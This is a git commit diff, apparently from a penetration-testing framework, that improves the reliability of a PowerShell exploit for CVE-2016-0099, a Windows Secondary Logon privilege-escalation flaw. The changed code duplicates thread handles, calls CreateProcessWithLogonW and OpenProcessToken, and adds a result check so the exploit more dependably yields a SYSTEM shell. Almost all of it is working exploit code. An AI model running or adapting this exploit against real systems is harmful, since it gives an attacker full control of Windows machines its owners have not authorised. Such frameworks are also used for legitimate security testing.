Land #7151, Improve CVE-2016-0099 reliability

bug/bundler_fix
Brent Cook 2016-07-29 09:22:11 -05:00
commit d1f65b27b8
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 18 additions and 5 deletions

View File

@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
$TidArray = @()
echo "[>] Duplicating CreateProcessWithLogonW handles.."
# Loop Get-ThreadHandle and collect thread handles with a valid TID
for ($i=0; $i -lt 500; $i++) {
# Loop 1 is fine, this never fails unless patched in which case the handle is 0
for ($i=0; $i -lt 1; $i++) {
$hThread = Get-ThreadHandle
$hThreadID = [Kernel32]::GetThreadId($hThread)
# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@ -309,6 +309,19 @@ Add-Type -TypeDefinition @"
0x00000002, $cmd, $args1,
0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo)
#---
# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
#---
# Missing this check used to cause the exploit to fail sometimes.
# If CreateProcessWithLogon fails OpenProcessToken won't succeed
# but we obviously don't have a SYSTEM shell :'( . Should be 100%
# reliable now!
#---
if (!$CallResult) {
continue
}
$hTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)